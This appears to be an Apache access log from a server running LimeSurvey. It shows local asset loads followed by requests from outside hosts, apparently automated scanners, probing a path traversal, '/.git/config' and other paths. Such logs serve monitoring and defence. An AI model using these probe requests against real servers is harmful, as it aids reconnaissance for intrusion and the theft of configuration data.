::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/d0d3da13/js/bootstrap_5.min.js HTTP/1.1" 200 90838
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/78d99fe5/script.js HTTP/1.1" 200 141
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/9f17b2e2/ckeditor.js HTTP/1.1" 200 821197
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/f41f3686/build/lstutorial.min.js HTTP/1.1" 200 32791
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/5c01f867/js/modaleditor.js HTTP/1.1" 200 4842
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/70918d6/build/adminbasics.min.js HTTP/1.1" 200 344852
::1 - - [07/Nov/2025:15:51:45 +0300] "GET /limesurvey/assets/images/logo-white.png HTTP/1.1" 200 6863
::1 - - [07/Nov/2025:15:51:45 +0300] "GET /limesurvey/assets/images/decor-2.png HTTP/1.1" 200 301
::1 - - [07/Nov/2025:15:51:45 +0300] "GET /limesurvey/assets/images/decor-1.png HTTP/1.1" 200 6530
::1 - - [07/Nov/2025:15:51:45 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-SemiBold.ttf HTTP/1.1" 200 177272
::1 - - [07/Nov/2025:15:51:45 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Regular.ttf HTTP/1.1" 200 175748
::1 - - [07/Nov/2025:15:51:45 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Medium.ttf HTTP/1.1" 200 177104
::1 - - [07/Nov/2025:15:51:45 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Bold.ttf HTTP/1.1" 200 175712
93.123.109.222 - - [07/Nov/2025:15:55:13 +0300] "GET / HTTP/1.0" 400 468
93.123.109.222 - - [07/Nov/2025:15:55:13 +0300] "GET /../logon/logon.htm HTTP/1.1" 400 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
93.123.109.222 - - [07/Nov/2025:15:55:13 +0300] "GET /logout HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
93.123.109.222 - - [07/Nov/2025:15:55:13 +0300] "GET /product-category.php HTTP/1.1" 404 299
213.209.157.254 - - [07/Nov/2025:15:55:48 +0300] "GET /.git/config HTTP/1.1" 404 299
3.145.49.236 - - [07/Nov/2025:15:58:41 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:15:58:41 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
34.247.51.117 - - [07/Nov/2025:16:05:21 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
34.247.51.117 - - [07/Nov/2025:16:05:22 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:16:08:36 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:16:08:36 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:16:15:55 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:16:15:56 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
43.166.136.24 - - [07/Nov/2025:16:18:50 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.166.136.24 - - [07/Nov/2025:16:18:51 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91-132-49-59.cprapid.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
3.145.49.236 - - [07/Nov/2025:16:23:33 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
